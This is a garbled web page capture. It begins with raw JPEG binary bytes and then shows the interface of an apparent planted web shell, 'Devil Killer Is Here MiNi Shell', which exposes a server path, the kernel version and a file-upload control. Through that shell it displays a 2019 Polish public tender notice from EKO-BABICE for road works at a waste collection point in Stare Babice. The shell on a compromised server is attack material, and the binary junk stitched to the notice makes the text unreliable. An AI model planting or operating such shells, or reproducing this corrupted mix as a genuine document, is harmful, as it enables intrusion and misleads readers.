JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190719/576053-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 576053-N-2019 z dnia 2019-07-19 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gminne Przedsiębiorstwo Komunalne EKO-BABICE Spółka z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Budowa i wyposażenie Punktu Selektywnej Zbiórki Odpadów Komunalnych w gminie Stare Babice (Zamówienie 1 - roboty drogowe, waga samochodowa)</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">POIiŚ, Oś priorytetowa II, Ochrona Środowiska, w tym adaptacja do zmian klimatu. Działanie 2.2 Gospodarka odpadami komunalnymi</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gminne Przedsiębiorstwo Komunalne EKO-BABICE Spółka z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">16026808000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Kutrzeby</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">36</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">05-082</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Stare Babice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">022 7229008, 7529253</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">jasinski@eko-babice.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">022 7229008, 7529253</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://eko-babice.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://eko-babice.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://eko-babice.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Za pośrednictwem operatora pocztowego, osobiście, lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gminne Przedsiębiorstwo Komunalne ,,EKO-BABICE" Sp. z o.o., ul. Gen. Kutrzeby 36, 05-082 Stare Babice, pok. nr 14 (sekretariat)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Budowa i wyposażenie Punktu Selektywnej Zbiórki Odpadów Komunalnych w gminie Stare Babice (Zamówienie 1 - roboty drogowe, waga samochodowa)</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">DIMiR / PR / 5 / 7 / 2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest kompleksowe wykonanie robót polegających nautwardzeniu terenu, wykonaniu chodników, parkingów, oraz wagi samochodowej na terenienowobudowanego Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK) w miejscowościStare Babice. 2. Przedmiot zamówienia obejmuje: 1) Wykonanie utwardzenia terenu wraz zewszystkimi podbudowami na terenie Punktu selektywnej zbiórki odpadów komunalnych 2)Wykonanie chodników oraz miejsc parkingowych 3) Wykonanie wagi samochodowej z płytą dennąpod wagę 3. Opis szczegółowy przedmiotu zamówienia zawarty jest w dokumentacji technicznej: 1)Załącznik nr 1 do niniejszego Opisu przedmiotu zamówienia z zaznaczeniem zakresu prac objętychniniejszym zamówieniem. 2) Projekty budowlane a) Projekt budowlany ,,Budynku garażowomagazynowegoz zapleczem socjalno-biurowym oraz punktem selektywnej zbiórki odpadówkomunalnych (PSZOK) w miejscowości Stare Babice" a. Tom I - Projekt zagospodarowania terenu iarchitektura b. Tom VI - drogi 3) Projekty wykonawcze a) Projekt wykonawczy - Architektura a. Rys.nr 1 - Projekt Wykonawczy - Projekt zagospodarowania terenu b. Rys. nr 5/A - Projekt Wykonawczy- Rzuty i przekroje - kontenery PSZOK i waga samochodowa b) Projekt wykonawczy - Konstrukcjaa. Rys. nr K-20 - Projekt Wykonawczy - Fundamenty - waga i kontenery c) Projekt wykonawczy -drogowy d) Specyfikacje techniczne wykonania i odbioru robót budowlanych - drogowy. 4)Dokumentacja załączona dla celów pomocniczych: a) Projekt budowlany ,,Budynku garażowomagazynowegoz zapleczem socjalno-biurowym oraz punktem selektywnej zbiórki odpadówkomunalnych (PSZOK) w miejscowości Stare Babice" a. Tom II - konstrukcja b. Tom III - instalacjesanitarne c. Tom IV - instalacje elektryczne d. Tom V - instalacje teletechniczne b) Pomiarygeodezyjne z zaznaczonymi rzędnymi terenu z kwietnia 2019 r. c) Opinia geotechniczna wykonana wpaździerniku 2018r. 5) Przedmiar robót drogowych. 4. Uwagi do opisu przedmiotu zamówienia 1)Zakres prac obejmuje wyłącznie teren PSZOK zgodnie z załącznikiem nr 1 do niniejszego ,,Opisuprzedmiotu zamówienia". 2) W nawiązaniu do pkt 1 w zakresie prac leży wykonanie wagisamochodowej w lokalizacji zgodnie z rys. arch. nr 5/A wraz z podbudową pod wagę w formie płytydennej na ustabilizowanym przez Wykonawcę gruncie (zgodnie z zaleceniami proj. konstrukcji). 3) Wzakresie prac leży wykonanie fundamentów punktowych żelbetowych pod 3 kontenery obsługiPSZOK (wraz z izolacją przeciwwodną fundamentów), zgodnie z rysunkiem konstrukcji ,,K-20 -Projekt Wykonawczy - Fundamenty - waga i kontenery" oraz rysunkiem architektury ,,5/A - ProjektWykonawczy - Rzuty i przekroje - kontenery PSZOK i waga samochodowa". Fundamentylokalizować w terenie wg rys. architektury. 4) Zamówienie obejmuje również wykonanie robótdrogowych wykazanych w projekcie ale zlokalizowanych na działkach drogowych nr 547/15 i 547/20(końcówki zjazdów, fragment chodnika, miejsca parkingowe równoległe do drogi). Powyższe pracenależy wykonać jako ostatnie, po dostarczeniu przez Zamawiającego pozwolenia na budowę na ww.działkach. 5) Mata bentonitowa w nawierzchni (ujęta w projekcie drogowym) powinna zostaćwywinięta na ściany pionowe fundamentów punktowych - przecinających tę matę (o których mowa wpkt 3), aż do lica nawierzchni. Mata bentonitowa powinna być wywinięta w sposób zapewniającyszczelność na każdym punkcie zgięcia zgodnie z technologią producenta maty i sztuką budowlaną.Matę należy nakładać na izolację powłokową przeciwwodną fundamentów. 6) Mata bentonitowa wnawierzchni (ujęta w projekcie drogowym) powinna zostać wywinięta na ściany pionoweobetonowania zewnętrznego prefabrykatów betonowych wagi (jak ukazano na rys. architektury), aż dolica nawierzchni na połączeniu pomiędzy prefabrykatem betonowym pionowym wagi a nawierzchnią zkostki betonowej utwardzenia PSZOK. Mata bentonitowa powinna być wywinięta w sposóbzapewniający szczelność na każdym punkcie zgięcia zgodnie z technologią producenta maty i sztukąbudowlaną. Matę należy nakładać na izolację powłokową przeciwwodną zabetonowania, o którymmowa wcześniej. 7) Fundamentowanie pod kontenerami oraz betonowanie płyty dennej wykonywaćzgodnie z rys. architektury i konstrukcji z betonu C30/37 z klasą ekspozycji XA1. 8) Propozycjękolorystyki elementów nawierzchni należy przedstawić Zamawiającemu do akceptacji na etapierealizacji. 9) Wykonawca zabezpieczy zamontowane elementy uzbrojenia terenu na czas budowy. 10)Zakres zamówienia obejmuje zabezpieczenie przed zabrudzeniem i uszkodzeniem elementówwbudowanych na wcześniejszych etapach. 11) Zakres zamówienia obejmuje dostawę i montażodwodnienia liniowego wzdłuż bramy wraz z podłączeniem do istniejącej kanalizacji deszczowej(wpustu deszczowego). Należy zastosować koryta ściekowe szer w świetle 200 mm, wys w świetlemin 200 mm z skrzynka ściekową wykonane z polimerobetonu. Przekrój V-kształtny. Zabezpieczeniekrawędzi żeliwo. Ruszt żeliwny klasy D400. Koryta ściekowe posadowione na ławie betonowejzgodnie z wytycznymi producenta pod ruch ciężki. Całkowita długość odwodnienia liniowego 7 mb.12) Zakres zamówienia obejmuje uzgodnienia oraz koszty czasowej zmiany organizacji ruchu na okresprowadzonych prac. 13) Koszty wywozu kontenerów śmieciowych, zużycia energii elektrycznej orazwody i odprowadzenia ścieków z kontenerów sanitarnych na czas budowy w zakresie robót objętychniniejszym zamówieniem leży po stronie Wykonawcy. 14) Wykonawca zobowiązany jest dostarczyćZamawiającemu karty przekazania odpadów szczególnie niebezpiecznych. 15) Wykonawca na bieżącobędzie koordynował front robót z pozostałymi Wykonawcami. 16) Wykonawca zapewni ciągłąmożliwość dojazdu na teren budowy. 17) Obowiązujące wytyczne odnośnie innych branż określonezostały ostatecznie w niniejszym opisie przedmiotu zamówienia. 18) Zakres zamówienia obejmujeobsługę geodezyjną wraz z wykonaniem inwentaryzacji powykonawczej dróg, chodników, uzbrojeniaterenu (włazów kanalizacyjnych), kontenerów biurowych i magazynowych, wraz z wniesieniem doewidencji materiałów państwowych zasobów geodezyjnych i kartograficznych. 19) Obowiązującąformą wynagrodzenia jest wynagrodzenie ryczałtowe, a załączone przedmiary robót stanowią jedyniemateriał pomocniczy do skalkulowania ceny ofertowej. 20) Na terenie przedmiotowej inwestycji będąprowadzone roboty. Wykonawca na bieżąco będzie koordynował front robót z pozostałymiWykonawcami. 5. Wymagania Zamawiającego, w związku z art. 29 ust. 3a Ustawy Prawo zamówieńpublicznych (zatrudnienie osób na podstawie umowy o pracę). 1) Roboty budowlane będąwykonywane przez osoby wymienione w Wykazie Pracowników, które zostaną wskazane przezWykonawcę lub Podwykonawcę, zwane dalej: ,,Pracownikami wykonującymi roboty budowlane". 2)Zamawiający wymaga, aby osoby bezpośrednio wykonujące roboty budowlane (tj. robotnicybudowlani) były w okresie realizacji niniejszego zamówienia zatrudnione przez Wykonawcę lubPodwykonawcę na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974r. - Kodeks pracy (Dz. U. z 2014 r., poz. 1502 ze zm.). Zamawiający informuje, iż powyższewymagania nie dotyczą osoby pełniącej funkcję kierownika budowy. 3) Zamawiający nie określaliczby Pracowników wykonujących roboty budowlane, pozostawiając to w gestii Wykonawcy, którybiorąc pod uwagę termin realizacji oraz rodzaj i zakres przedmiotu zamówienia zobowiązany jestokreślić liczbę tych pracowników w Wykazie Pracowników. 4) Wykonawca na wezwanieZamawiającego zobowiązany jest przedłożyć Zamawiającemu Wykaz Pracowników wykonującychroboty budowlane wchodzące w zakres niniejszego zamówienia. Wykonawca zobowiązany jest doaktualizacji Wykazu w każdym przypadku wystąpienia okoliczności powodujących jego zmianę.Zamawiający na każdym etapie realizacji zamówienia jest uprawniony do kontroli przestrzeganiaprzez Wykonawcę lub Podwykonawcę postanowień Umowy w tym zakresie. 5) W trakcie realizacjizamówienia na każde wezwanie Zamawiającego, w wyznaczonym w tym wezwaniu terminie,Wykonawca przedłoży Zamawiającemu wskazane poniżej dowody, w celu potwierdzenia spełnieniawymogu zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub PodwykonawcęPracowników wykonujących roboty budowlane: oświadczenie Wykonawcy lub Podwykonawcy ozatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanieZamawiającego. Oświadczenie to powinno zawierać m.in. dokładne określenie podmiotu składającegooświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonująosoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, imion inazwisk tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej dozłożenia oświadczenia w imieniu Wykonawcy lub Podwykonawcy; poświadczone przezWykonawcę lub Podwykonawcę za zgodność z oryginałem kopie umów o pracę zawartych przezWykonawcę lub Podwykonawcę z Pracownikami wykonującymi roboty budowlane. Kopie umówpowinny zostać zanonimizowane w sposób zapewniający ochronę danych osobowych pracowników,zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (tekstjednolity Dz. U. z 2016 r. poz. 922), w szczególności bez adresów, nr PESEL pracowników. Imię inazwisko pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy, rodzajumowy o pracę i wymiar etatu muszą być możliwe do zidentyfikowania; zaświadczenie właściwegooddziału ZUS, potwierdzające opłacanie przez Wykonawcę lub Podwykonawcę składek naubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okresrozliczeniowy; poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę lubPodwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę doubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników,zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych. Imię i nazwiskopracownika nie podlega anonimizacji. 6) Nieprzedłożenie przez Wykonawcę poświadczonych przezWykonawcę lub Podwykonawcę za zgodność z oryginałem kopii umów zawartych przez Wykonawcęlub Podwykonawcę z Pracownikami wykonującymi roboty budowlane lub innych żądanych dowodówpotwierdzających spełnianie przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia napodstawie umowy o pracę - w terminie wskazanym przez Zamawiającego - będzie traktowane jakoniewypełnienie obowiązku zatrudnienia Pracowników wykonujących roboty budowlane na podstawieumowy o pracę. Za niedopełnienie wymogu zatrudniania Pracowników wykonujących robotybudowlane na podstawie umowy o pracę, Wykonawca zapłaci Zamawiającemu kary umowne wwysokości określonej w § 19 Umowy. 7) W przypadku uzasadnionych wątpliwości co doprzestrzegania prawa pracy przez Wykonawcę lub Podwykonawcę, Zamawiający może zwrócić się oprzeprowadzenie kontroli przez Państwową Inspekcję Pracy. 6. Zamawiający w okresie 3 lat odudzielenia zamówienia podstawowego przewiduje udzielenie zamówień, o których mowa w art. 67 ust.1 pkt 6 Pzp, w wysokości nie większej niż 50% wartości zamówienia podstawowego i polegających napowtórzeniu podobnych robót budowlanych zgodnych z przedmiotem zamówienia. Na okolicznośćwystąpienia przedmiotowych zamówień zostanie zawarta umowa w trybie zamówienia z wolnej rękipoprzedzona stosownymi negocjacjami z Wykonawcą. 7. Zamówienie musi być wykonane zgodnie zSIWZ, umową, dokumentacją projektową, 